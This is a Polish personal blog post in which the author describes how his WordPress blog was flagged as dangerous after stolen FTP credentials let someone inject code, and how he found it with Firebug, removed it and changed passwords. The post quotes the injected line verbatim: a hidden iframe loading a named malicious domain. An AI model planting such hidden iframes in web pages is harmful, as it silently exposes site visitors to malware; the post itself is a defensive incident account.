markasblog

W dniu wczorajszym wiele osób, które na mojego bloga zaglądają mogły się zdziwić widząc komunikat, że strona została uznana za niebezpieczną i może linkować do niebezpiecznego oprogramowania (czyt. wirusów). Wy się zdziwiliście… A co ja miałem powiedzieć? Pomyślałem sobie, najpierw Windows XP na blaszaku ugiął się pod naporem wirusów, a teraz jeszcze bloga nie chcą mi oszczędzić… WTF?! Ale cóż, stało się… Najprawdopodobniej sam się przyczyniłem do tego, że ktoś wstrzyknął mi na stronę kod, który linkował do jl.chura.pl/rc/ (celowo tutaj nie stworzyłem linka, aby nie kusić do wchodzenia na stronę, bowiem na 100% skończy się to zainfekowaniem systemu).

Jak to się stało, że ktoś był w stanie wstrzyknąć szkodliwy fragment kodu do mojej strony. Myślę, a nawet jestem pewien, że za cały incydent odpowiada Total Commander, z którego korzystałem do wymiany plików pomiędzy serwerem hostującym moją stronę, a twardym dyskiem mojego komputera po protokole FTP. Moim błędem, było stworzenie profilu w Total Commanderze do łączenia się z serwerem FTP cba.pl (to akurat rzecz normalnie stosowana i raczej nie niosąca żadnego niebezpieczeństwa) i zapisanie na stałe w profilu hasła do tegoż serwera (i tutaj powinienem się wstydzić, bo jako doświadczonemu użytkownikowi komputera, takich błędów nie wypada robić). Okazuje się, że nie należy ignorować informacji płynących z portali internetowych zajmujących się bezpieczeństwem sieci. Ja niestety zignorowałem komunikat o poważnej luce w Total Commanderze i doigrałem się – hasła zostały wykradzione.

Na trop fragmentu kodu naprowadził mnie raport z „Narzędzi dla webmasterów” udostępnionych przez Google. W raporcie było wyraźnie zaznaczone, że blog linkuje do domeny chura.pl, która jest uznana za niebezpieczną. Cóż, nie pozostało mi nic innego jak przeszukać zawartość plików WordPressa pod kątem zawartości tekstu z ciągiem znaków chura.pl.

Pomocnym narzędziem okazało się rozszerzenie do Firefoksa o nazwie Firebug. Jest to narzędzie, które pozwala przede wszystkim na podgląd kodu strony aktualnie wyświetlanej w przeglądarce internetowej. Skorzystałem z narzędzia wyszukiwania tekstu (wbudowane w Firebuga) i znalazłem. Znalazłem kod, który wyglądał jak poniżej:

<iframe src=”http://jL.chura.pl/rc/” style=”display:none”></iframe>

Jak już zlokalizowałem konkretny fragment kodu za pomocą Firebuga, nie było problemu z usunięciem wstrzykniętego kodu z plików WordPressa. Po dokładnym przeanalizowaniu całości kodu i upewnieniu się, że już nic więcej niepowołanego w nim nie siedzi, zgłosiłem do Google ponowną prośbę o przeanalizowanie strony pod kątem bezpieczeństwa dla odwiedzających. O godzinie 6:00 w poniedziałek (19.06.2009) blog wrócił do sieci już nie obarczony komunikatem o potencjalnym niebezpieczeństwie.

Ja sam pozmieniałem hasła dostępu do wszystkich serweró, które współtworzą infrastrukturę, na której jest mój blog oparty (FTP, MySQL) i oczywiście wykasowałem (i już nie będę zapisywał) z profilów Total Commandera wszelkie hasła. Pragnę również zapewnić wszystkich, że dołożę wszelkich starań, aby odwiedzanie mojego bloga było bezpieczne i nie groziło złapaniem jakiegoś świństwa.

Podobne wpisy

1. Sandbox Adobe nie taki znowu bezpieczny?
2. Stary adres przekierowany na markasblog.pl
3. Odrobine zmian na markasblog.cba.pl
4. markasblog przechodzi małe zmiany
5. markasblog złapał drugi oddech:-)